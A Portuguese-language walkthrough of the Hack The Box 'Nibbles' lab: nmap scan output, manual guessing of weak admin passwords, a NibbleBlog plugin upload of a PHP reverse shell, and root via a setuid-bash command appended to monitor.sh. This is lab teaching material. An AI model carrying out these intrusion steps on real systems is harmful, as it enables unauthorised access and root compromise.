Enumeration
Iniciamos o processo de enumeracao…
# Nmap 7.80 scan initiated Mon Jul 13 18:51:10 2020 as: nmap -vv --reason -Pn -sV -sC --version-all -oN /root/HTB-Linux/nibbles/results/10.10.10.75/scans/_quick_tcp_nmap.txt -oX /root/HTB-Linux/nibbles/results/10.10.10.75/scans/xml/_quick_tcp_nmap.xml 10.10.10.75
Nmap scan report for 10.10.10.75
Host is up, received user-set (0.13s latency).
Scanned at 2020-07-13 18:51:11 EDT for 15s
Not shown: 998 closed ports
Reason: 998 resets
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack ttl 63 OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 c4:f8:ad:e8:f8:04:77:de:cf:15:0d:63:0a:18:7e:49 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQD8ArTOHWzqhwcyAZWc2CmxfLmVVTwfLZf0zhCBREGCpS2WC3NhAKQ2zefCHCU8XTC8hY9ta5ocU+p7S52OGHlaG7HuA5Xlnihl1INNsMX7gpNcfQEYnyby+hjHWPLo4++fAyO/lB8NammyA13MzvJy8pxvB9gmCJhVPaFzG5yX6Ly8OIsvVDk+qVa5eLCIua1E7WGACUlmkEGljDvzOaBdogMQZ8TGBTqNZbShnFH1WsUxBtJNRtYfeeGjztKTQqqj4WD5atU8dqV/iwmTylpE7wdHZ+38ckuYL9dmUPLh4Li2ZgdY6XniVOBGthY5a2uJ2OFp2xe1WS9KvbYjJ/tH
| 256 22:8f:b1:97:bf:0f:17:08:fc:7e:2c:8f:e9:77:3a:48 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBPiFJd2F35NPKIQxKMHrgPzVzoNHOJtTtM+zlwVfxzvcXPFFuQrOL7X6Mi9YQF9QRVJpwtmV9KAtWltmk3qm4oc=
| 256 e6:ac:27:a3:b5:a9:f1:12:3c:34:a5:5d:5b:eb:3d:e9 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIC/RjKhT/2YPlCgFQLx+gOXhC6W3A3raTzjlXQMT8Msk
80/tcp open http syn-ack ttl 63 Apache httpd 2.4.18 ((Ubuntu))
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Mon Jul 13 18:51:26 2020 -- 1 IP address (1 host up) scanned in 15.55 seconds
Encontro duas portas abertas…. 80 e 22
Acessando o server apache na porta 80 encontro uma simples msg…
Olhando o source encontro um comentario que nos leva a uma applicacao Nibblesblog
Accessando a aplicacao e pesquisando sobre ela, encontro duas exploracoes… se for a versao 3 existe multiplos sqli
se for a 4 eu preciso de um usuario e senha para explorar.
entao, verifiquei logo se era possovel sqli mas depois de verificar, vi que nao era… entao, restava obter uma login valido..
tentei, varias WORDLISTS mas sem sucesso… a aplicacao sempre me bloqueava depois de algumas tentativas…
Resolvi entao, fazer manualmente algo do tipoo
admin:admin
admin:123456
admin:nibbles
admin:12345678 --->>> LEMBRE-SE DE TENTAR O MAXIMO DE SENHAS (empresa@2020, nomedamaquina, UPPER, lower e etc.. AS pessoas costumam usar senhas faceis)
admin:password
admin:Passw0rd
admin:passw0rd!
na terceira tentativa eu consigo o acesso que precisava com o admin:nibbles
, agora usanso a exploracao para a versao 4 de acordo com esse site, obtenho rapidamente uma reverse shell..
Reverse Shell
reference https://packetstormsecurity.com/files/133425/NibbleBlog-4.0.3-Shell-Upload.html
1 - acesse http://10.10.10.75/nibbleblog/admin.php?controller=plugins&action=config&plugin=my_image
2 - em seguida, localize em seu kali um shell em php locate php-reverse
3 - edite com seu ip e a porta desejada.
4 - ative o listen na porta escolhida
5 - faca o uplload da reverse shell
6 - e acesse sua reverse nesse link.. http://10.10.10.75/nibbleblog/content/private/plugins/my_image/
agora que temos nossa shell vamos escalar nossos privilegios
Privilege Escalation
Usando algums tools para agilizaar o processo de PE encontro algo interessante,
entao, depois de extrair tenho acesso ao arquivo monitor.sh
adicionei uma nova linha nesse arquivo com o seguinte comando
echo "cp /bin/bash /tmp/rootbash; chown root /tmp/rootbash; chmod +s /tmp/rootbash" >> monitor.sh
logo em seguida executei
navego entao ate o \tmp
dou permissao de execucao ao nosso rootbash
usando o seguinte comando chmod +x rootbash
e entao depois de ter feito isso, eh so executar rootbash -p